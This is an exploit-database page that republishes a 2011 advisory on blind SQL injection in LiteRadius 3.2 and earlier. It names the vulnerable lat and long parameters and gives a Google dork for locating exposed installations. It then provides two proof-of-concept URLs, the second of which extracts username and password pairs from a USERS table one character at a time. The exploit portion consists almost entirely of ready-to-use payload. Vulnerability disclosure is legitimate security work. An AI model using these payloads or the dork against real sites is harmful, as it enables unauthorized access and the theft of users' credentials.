[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LiteRadius <= 3.2 - Multiple Blind SQL Injection Vulnerabilities

Author
Robert Cooper
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16517
Category
web applications
Date add
13-07-2011
Platform
php
# Exploit Title: LiteRadius <= 3.2 - Multiple Blind SQL Injection vulnerabilities
# Google Dork: allinurl: locator.php?long=
# Date: 7/12/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.escaperadius.com/er/products/literadius/lr.php
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: lat=, long=
 
##############################################################
PoC:
 
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
http://domain.com/dealer/locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80
 
 
##############################################################
www.websiteauditing.org
www.areyousecure.net
 
# Shouts to the Belegit crew



#  0day.today [2024-12-24]  #